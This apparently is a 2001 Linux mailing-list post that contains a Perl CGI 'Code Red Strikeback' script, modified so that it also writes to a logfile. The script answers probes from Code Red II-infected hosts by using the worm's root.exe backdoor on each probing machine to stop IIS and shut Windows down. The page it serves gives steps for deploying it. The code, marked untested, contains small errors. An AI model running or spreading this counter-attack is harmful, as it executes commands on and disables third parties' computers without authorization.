Untested.....
On Tue, 18 Sep 2001 18:01:09 -0400 "Douglas J. Hunley" wrote:
>
> --------------Boundary-00=_X5PVGL44QK2PKGFRFUX0
> Content-Type: text/plain;
> charset="iso-8859-1"
> Content-Transfer-Encoding: 8bit
>
> I need someone to modify the code attached to print to a logfile
> (/var/log/code_red) a duplicate of everything it currents prints to stdout.
> Any takers? Thanks!
> --
> Douglas J. Hunley ([EMAIL PROTECTED]) - Linux User #174778
> Admin: http://hunley.homeip.net/ Admin: http://linux.nf/
> Brainbench Linux Administration Certified
>
#!/usr/bin/perl -w
# default.ida in perl
# Copyright 2001 Sam Phillips <[EMAIL PROTECTED]>
# ideas borrowed from Erin Quinlan <[EMAIL PROTECTED]>
# ideas provided by various Internet folk, and all those darn
# Crackmonkeys (http://www.crackmonkey.org) and Pigdoggers
# (http://www.pigdog.org)
# Text modifications by Andreas Huettel <[EMAIL PROTECTED]>
#
# Things that this should do...
# * Send email to the machine owner
# * Not act as an attack amplifier - someone could theoretically use this
# to launch a DOS attack of sorts.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
use LWP::UserAgent;
$|++;
open (LOG,">>/var/log/code_red") || carp "Can't open logfile\n";
print "Content-Type: text/html\n\n";
print LOG "Content-Type: text/html\n\n";
if (length ($ENV{QUERY_STRING}) > 0) {
my $ua = new LWP::UserAgent;
$ua->agent ("Code Red Strikeback");
$ua->timeout (20);
my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop";);
print "probulating... <br>";
print LOG "probulating... <br>";
my $resp = $ua->request ($iis_stop_req);
if ($resp->is_success) {
print "Appears we have shut down IIS...<br>";
print LOG "Appears we have shut down IIS...<br>";
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5";);
$resp = $ua->request ($server_stop_req);
if ($resp->is_success) {
print "Appears that we have also shutdown whatever OS too...<br>";
print LOG "Appears that we have also shutdown whatever OS too...<br>";
}
# ok this will do magic email stuff when I get a chance to write it.
} else {
print "<h2>Boy! Are you yankin' my chain?!?</h2>";
print LOG "<h2>Boy! Are you yankin' my chain?!?</h2>";
}
}
print <<EOF;
<p>
<h1>WELCOME READERS!</h1>
</p>
<p>
<H2>If you are reading this page, then you are probably curious... </H2>
</p>
<p>
This page is actually a script that will connect to your machine and
try to shut it down. Since you are seeing this you probably aren't a
Code Red infected box.
</p>
<p>
This will only work if you are infected with the "code red II" worm
which uses a well-known vulnerability of the Microsoft Internet
Information Server (IIS) and installs a backdoor on every infected
computer. For technical information about the Code Red II worm see <a
href="http://www.incidents.org/react/code_redII.php";>http://www.incidents.org/react/code_redII.php</a>.
</p>
<p>
If you were a Code Red infected IIS then the command just sent to port
80 was to stop iis and to reboot your machine. If you aren't infected,
then you have nothing to worry about, otherwise.. you should really use
a secure <A HREF="http://www.apache.org/";>webserver</A> don't you think?
. one that doesn't let people in a gaping back door to do stuff like this...)
</p>
<p>
This is how you can protect yourself and others, if you run perl, and a
competent web server:
<ol>
<li>Download this <a href="default.txt">script</a>.</li>
<li>Rename it default.ida and place it in the DocumentRoot of your
server</li>
<li>Make sure the .ida extension is handled as a perl CGI
script.</li>
</ol>
If you can't figure out any of the above instructions then find someone
who can.
</p>
EOF
_______________________________________________
http://linux.nf -- [EMAIL PROTECTED]
Archives, Subscribe, Unsubscribe, Digest, Etc
->http://linux.nf/mailman/listinfo/linux-users
